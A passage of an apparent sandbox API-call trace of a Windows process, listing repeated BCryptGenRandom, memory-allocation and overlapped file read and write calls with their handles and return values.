pbBuffer=0x336fc30) returned 0x0 [0200.289] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.289] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.289] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.289] free (_Block=0x3e305b8) [0200.290] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.290] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.290] free (_Block=0x1fa91d0) [0200.290] free (_Block=0x1fa2ed8) [0200.290] free (_Block=0x1fa90b8) [0200.290] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.291] CloseHandle (hObject=0x3cc) returned 1 [0200.291] free (_Block=0x3df0008) [0200.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.291] CloseHandle (hObject=0x308) returned 1 [0200.291] free (_Block=0x1ff1e60) [0200.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.301] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.301] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.301] free (_Block=0x3e305b8) [0200.301] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.301] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.301] free (_Block=0x1fa91d0) [0200.301] free (_Block=0x1fa2ed8) [0200.301] free (_Block=0x1fa90b8) [0200.302] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0200.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.322] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.322] free (_Block=0x3e305b8) [0200.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.322] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.323] free (_Block=0x1fa91d0) [0200.323] free (_Block=0x1fa2ed8) [0200.323] free (_Block=0x1fa90b8) [0200.323] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.324] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0200.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.325] CloseHandle (hObject=0x308) returned 1 [0200.325] free (_Block=0x3df0008) [0200.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.780] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.780] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.780] free (_Block=0x3e305b8) [0200.780] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.780] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.780] free (_Block=0x1fa91d0) [0200.780] free (_Block=0x1fa2ed8) [0200.780] free (_Block=0x1fa90b8) [0200.780] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.789] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.789] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.790] free (_Block=0x3e305b8) [0200.790] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.790] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.790] free (_Block=0x1fa91d0) [0200.790] free (_Block=0x1fa2ed8) [0200.790] free (_Block=0x1fa90b8) [0200.790] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.791] CloseHandle (hObject=0x3cc) returned 1 [0200.791] free (_Block=0x1ff1e60) [0200.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.798] CloseHandle (hObject=0x308) returned 1 [0200.798] free (_Block=0x3df0008) [0200.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.800] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x726, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0200.800] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.801] CloseHandle (hObject=0x170) returned 1 [0200.801] free (_Block=0x3d70450) [0200.801] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.824] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.825] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.825] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.825] free (_Block=0x3e305b8) [0200.825] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.825] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.825] free (_Block=0x1fa91d0) [0200.825] free (_Block=0x1fa2ed8) [0200.825] free (_Block=0x1fa90b8) [0200.826] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.837] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.837] free (_Block=0x3e305b8) [0200.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.837] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.837] free (_Block=0x1fa91d0) [0200.837] free (_Block=0x1fa2ed8) [0200.837] free (_Block=0x1fa90b8) [0200.837] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.847] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.847] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.847] free (_Block=0x3e305b8) [0200.847] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.847] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.848] free (_Block=0x1fa91d0) [0200.848] free (_Block=0x1fa2ed8) [0200.848] free (_Block=0x1fa90b8) [0200.848] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0200.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.855] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0200.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.022] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa97, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0206.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.033] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0206.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.041] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x384, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0206.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.042] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0206.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.074] CloseHandle (hObject=0xec) returned 1 [0206.074] free (_Block=0x3ef0008) [0206.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.080] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x117, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0206.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.080] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0206.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0206.081] CloseHandle (hObject=0x308) returned 1 [0206.081] free (_Block=0x3f70048) [0206.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0209.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0209.331] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.331] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.331] free (_Block=0x3e305b8) [0209.331] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.331] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.332] free (_Block=0x1fa91d0) [0209.333] free (_Block=0x1fa2ed8) [0209.333] free (_Block=0x1fa90b8) [0209.333] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0209.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.337] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2ae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.338] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.515] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.516] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.516] CloseHandle (hObject=0x308) returned 1 [0209.516] free (_Block=0x3d70450) [0209.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0209.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0209.575] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.575] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.575] free (_Block=0x3e305b8) [0209.575] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.575] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.576] free (_Block=0x1fa91d0) [0209.576] free (_Block=0x1fa2ed8) [0209.576] free (_Block=0x1fa90b8) [0209.576] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0209.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.577] WriteFile (in: 